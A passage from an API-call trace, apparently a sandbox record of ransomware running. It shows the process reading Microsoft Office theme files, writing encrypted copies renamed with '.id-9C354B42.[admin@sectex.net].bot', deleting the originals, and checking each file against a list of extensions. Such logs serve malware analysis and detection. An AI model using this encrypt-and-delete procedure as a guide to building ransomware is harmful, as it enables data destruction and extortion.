	[0141.302] ReadFile (in: hFile=0x3a0, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0141.303] WriteFile (in: hFile=0x31c, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xea, lpOverlapped=0x0) returned 1
	[0141.303] SetEndOfFile (hFile=0x31c) returned 1
	[0141.303] CloseHandle (hObject=0x31c) returned 1
	[0141.303] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.303] SetEndOfFile (hFile=0x3a0) returned 1
	[0141.306] CloseHandle (hObject=0x3a0) returned 1
	[0141.306] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Austin.eftx.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0141.306] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Austin.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\austin.eftx")) returned 1
	[0141.307] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Austin.eftx") returned 78
	[0141.307] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Austin.eftx") returned 78
	[0141.307] lstrlenW (lpString=".doc") returned 4
	[0141.307] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0141.307] lstrlenW (lpString=".docx") returned 5
	[0141.307] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0141.307] lstrlenW (lpString=".pdf") returned 4
	[0141.307] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0141.307] lstrlenW (lpString=".xls") returned 4
	[0141.307] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0141.307] lstrlenW (lpString=".xlsx") returned 5
	[0141.307] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0141.307] lstrlenW (lpString=".ppt") returned 4
	[0141.307] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0141.307] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Austin.eftx") returned 78
	[0141.307] lstrlenW (lpString=".zip") returned 4
	[0141.307] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0141.307] lstrlenW (lpString=".rar") returned 4
	[0141.307] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0141.307] lstrlenW (lpString=".bz2") returned 4
	[0141.307] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0141.307] lstrlenW (lpString=".7z") returned 3
	[0141.307] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0141.307] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Austin.eftx") returned 78
	[0141.307] lstrlenW (lpString=".dbf") returned 4
	[0141.307] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0141.307] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Austin.eftx") returned 78
	[0141.307] lstrlenW (lpString=".1cd") returned 4
	[0141.307] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0141.308] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Austin.eftx") returned 78
	[0141.308] lstrlenW (lpString=".jpg") returned 4
	[0141.308] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0141.308] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Austin.eftx") returned 78
	[0141.308] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Austin.eftx") returned 78
	[0141.308] lstrlenW (lpString=".doc") returned 4
	[0141.308] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0141.308] lstrlenW (lpString=".docx") returned 5
	[0141.308] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0141.308] lstrlenW (lpString=".pdf") returned 4
	[0141.308] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0141.308] lstrlenW (lpString=".xls") returned 4
	[0141.308] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0141.308] lstrlenW (lpString=".xlsx") returned 5
	[0141.308] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0141.308] lstrlenW (lpString=".ppt") returned 4
	[0141.308] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0141.308] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Austin.eftx") returned 78
	[0141.308] lstrlenW (lpString=".zip") returned 4
	[0141.308] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0141.308] lstrlenW (lpString=".rar") returned 4
	[0141.308] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0141.308] lstrlenW (lpString=".bz2") returned 4
	[0141.308] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0141.308] lstrlenW (lpString=".7z") returned 3
	[0141.308] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0141.308] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Austin.eftx") returned 78
	[0141.308] lstrlenW (lpString=".dbf") returned 4
	[0141.308] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0141.308] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Austin.eftx") returned 78
	[0141.308] lstrlenW (lpString=".1cd") returned 4
	[0141.308] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0141.308] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Austin.eftx") returned 78
	[0141.308] lstrlenW (lpString=".jpg") returned 4
	[0141.309] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0141.309] lstrcmpiW (lpString1=".eftx", lpString2=".bot") returned 1
	[0141.309] lstrlenW (lpString="Black Tie.eftx") returned 14
	[0141.309] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Black Tie.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\black tie.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0141.387] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=618119) returned 1
	[0141.387] CloseHandle (hObject=0x3ac) returned 1
	[0141.387] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Black Tie.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\black tie.eftx")) returned 0x20
	[0141.402] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Black Tie.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\black tie.eftx.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0141.407] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Black Tie.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\black tie.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0141.416] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.418] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.418] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Black Tie.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\black tie.eftx.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0141.429] GetLastError () returned 0x0
	[0141.429] ReadFile (in: hFile=0x3a4, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x96e87, lpOverlapped=0x0) returned 1
	[0141.450] WriteFile (in: hFile=0x3b4, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x96e90, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x96e90, lpOverlapped=0x0) returned 1
	[0141.461] ReadFile (in: hFile=0x3a4, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0141.461] WriteFile (in: hFile=0x3b4, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xf0, lpOverlapped=0x0) returned 1
	[0141.461] SetEndOfFile (hFile=0x3b4) returned 1
	[0141.461] CloseHandle (hObject=0x3b4) returned 1
	[0141.461] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.461] SetEndOfFile (hFile=0x3a4) returned 1
	[0141.478] CloseHandle (hObject=0x3a4) returned 1
	[0141.478] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Black Tie.eftx.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0141.844] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Black Tie.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\black tie.eftx")) returned 1
	[0141.878] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Black Tie.eftx") returned 81
	[0141.878] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Black Tie.eftx") returned 81
	[0141.878] lstrlenW (lpString=".doc") returned 4
	[0141.878] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0141.878] lstrlenW (lpString=".docx") returned 5
	[0141.878] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0141.878] lstrlenW (lpString=".pdf") returned 4
	[0141.878] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0141.878] lstrlenW (lpString=".xls") returned 4
	[0141.878] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0141.878] lstrlenW (lpString=".xlsx") returned 5
	[0141.878] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0141.878] lstrlenW (lpString=".ppt") returned 4
	[0141.878] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0141.878] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Black Tie.eftx") returned 81
	[0141.878] lstrlenW (lpString=".zip") returned 4
	[0141.878] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0141.878] lstrlenW (lpString=".rar") returned 4
	[0141.878] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0141.878] lstrlenW (lpString=".bz2") returned 4
	[0141.878] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0141.879] lstrlenW (lpString=".7z") returned 3
	[0141.879] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0141.879] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Black Tie.eftx") returned 81
	[0141.879] lstrlenW (lpString=".dbf") returned 4
	[0141.879] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0141.879] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Black Tie.eftx") returned 81
	[0141.879] lstrlenW (lpString=".1cd") returned 4
	[0141.879] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0141.879] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Black Tie.eftx") returned 81
	[0141.879] lstrlenW (lpString=".jpg") returned 4
	[0141.879] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0141.879] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Black Tie.eftx") returned 81
	[0141.879] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Black Tie.eftx") returned 81
	[0141.879] lstrlenW (lpString=".doc") returned 4
	[0141.879] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0141.879] lstrlenW (lpString=".docx") returned 5
	[0141.879] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0141.879] lstrlenW (lpString=".pdf") returned 4
	[0141.879] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0141.879] lstrlenW (lpString=".xls") returned 4
	[0141.879] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0141.879] lstrlenW (lpString=".xlsx") returned 5
	[0141.879] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0141.879] lstrlenW (lpString=".ppt") returned 4
	[0141.879] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0141.879] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Black Tie.eftx") returned 81
	[0141.879] lstrlenW (lpString=".zip") returned 4
	[0141.879] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0141.879] lstrlenW (lpString=".rar") returned 4
	[0141.879] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0141.879] lstrlenW (lpString=".bz2") returned 4
	[0141.879] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0141.879] lstrlenW (lpString=".7z") returned 3
	[0141.879] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0141.880] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Black Tie.eftx") returned 81
	[0141.880] lstrlenW (lpString=".dbf") returned 4
	[0141.880] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0141.880] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Black Tie.eftx") returned 81
	[0141.880] lstrlenW (lpString=".1cd") returned 4
	[0141.880] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0141.880] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Black Tie.eftx") returned 81
	[0141.880] lstrlenW (lpString=".jpg") returned 4
	[0141.880] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0141.880] lstrcmpiW (lpString1=".eftx", lpString2=".bot") returned 1
	[0141.880] lstrlenW (lpString="Grid.eftx") returned 9
	[0141.880] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Grid.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\grid.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0141.971] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=18639) returned 1
	[0141.971] CloseHandle (hObject=0x384) returned 1
	[0141.971] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Grid.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\grid.eftx")) returned 0x20
	[0141.971] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Grid.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\grid.eftx.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0141.972] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Grid.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\grid.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0141.972] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.972] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.972] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Grid.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\grid.eftx.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0141.972] GetLastError () returned 0x0
	[0141.972] ReadFile (in: hFile=0x384, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x48cf, lpOverlapped=0x0) returned 1
	[0141.974] WriteFile (in: hFile=0x3a8, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x48d0, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x48d0, lpOverlapped=0x0) returned 1
	[0141.975] ReadFile (in: hFile=0x384, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0141.975] WriteFile (in: hFile=0x3a8, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0141.975] SetEndOfFile (hFile=0x3a8) returned 1
	[0141.975] CloseHandle (hObject=0x3a8) returned 1
	[0141.975] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.976] SetEndOfFile (hFile=0x384) returned 1
	[0141.978] CloseHandle (hObject=0x384) returned 1
	[0141.978] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Grid.eftx.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0141.978] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Grid.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\grid.eftx")) returned 1
	[0141.979] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Grid.eftx") returned 76
	[0141.979] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Grid.eftx") returned 76
	[0141.979] lstrlenW (lpString=".doc") returned 4
	[0141.979] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0141.979] lstrlenW (lpString=".docx") returned 5
	[0141.979] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0141.979] lstrlenW (lpString=".pdf") returned 4
	[0141.979] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0141.979] lstrlenW (lpString=".xls") returned 4
	[0141.979] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0141.979] lstrlenW (lpString=".xlsx") returned 5
	[0141.979] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0141.979] lstrlenW (lpString=".ppt") returned 4
	[0141.979] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0141.979] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Grid.eftx") returned 76
	[0141.979] lstrlenW (lpString=".zip") returned 4
	[0141.979] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0141.979] lstrlenW (lpString=".rar") returned 4
	[0141.979] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0141.979] lstrlenW (lpString=".bz2") returned 4
	[0141.979] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0141.979] lstrlenW (lpString=".7z") returned 3
	[0141.979] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0141.979] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Grid.eftx") returned 76
	[0141.979] lstrlenW (lpString=".dbf") returned 4
	[0141.979] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0141.979] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Grid.eftx") returned 76
	[0141.979] lstrlenW (lpString=".1cd") returned 4
	[0141.980] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0141.980] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Grid.eftx") returned 76
	[0141.980] lstrlenW (lpString=".jpg") returned 4
	[0141.980] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0141.980] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Grid.eftx") returned 76
	[0141.980] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Grid.eftx") returned 76
	[0141.980] lstrlenW (lpString=".doc") returned 4
	[0141.980] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0141.980] lstrlenW (lpString=".docx") returned 5
	[0141.980] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0141.980] lstrlenW (lpString=".pdf") returned 4
	[0141.980] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0141.980] lstrlenW (lpString=".xls") returned 4
	[0141.980] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0141.980] lstrlenW (lpString=".xlsx") returned 5
	[0141.980] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0141.980] lstrlenW (lpString=".ppt") returned 4
	[0141.980] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0141.980] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Grid.eftx") returned 76
	[0141.980] lstrlenW (lpString=".zip") returned 4
	[0141.980] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0141.980] lstrlenW (lpString=".rar") returned 4
	[0141.980] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0141.980] lstrlenW (lpString=".bz2") returned 4
	[0141.980] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0141.980] lstrlenW (lpString=".7z") returned 3
	[0141.980] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0141.980] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Grid.eftx") returned 76
	[0141.980] lstrlenW (lpString=".dbf") returned 4
	[0141.980] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0141.980] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Grid.eftx") returned 76
	[0141.980] lstrlenW (lpString=".1cd") returned 4
	[0141.980] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0141.981] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Grid.eftx") returned 76
	[0141.981] lstrlenW (lpString=".jpg") returned 4
	[0141.981] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0141.981] lstrcmpiW (lpString1=".eftx", lpString2=".bot") returned 1
	[0141.981] lstrlenW (lpString="Median.eftx") returned 11
	[0141.981] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Median.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\median.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0141.985] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=39546) returned 1
	[0141.985] CloseHandle (hObject=0x3b4) returned 1
	[0141.985] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Median.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\median.eftx")) returned 0x20
	[0141.985] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Median.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\median.eftx.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0141.995] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Median.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\median.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0141.995] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.995] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.995] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Median.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\median.eftx.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0141.995] GetLastError () returned 0x0
	[0141.995] ReadFile (in: hFile=0x3a8, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x9a7a, lpOverlapped=0x0) returned 1
	[0141.997] WriteFile (in: hFile=0x3b4, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x9a80, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x9a80, lpOverlapped=0x0) returned 1
	[0141.999] ReadFile (in: hFile=0x3a8, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
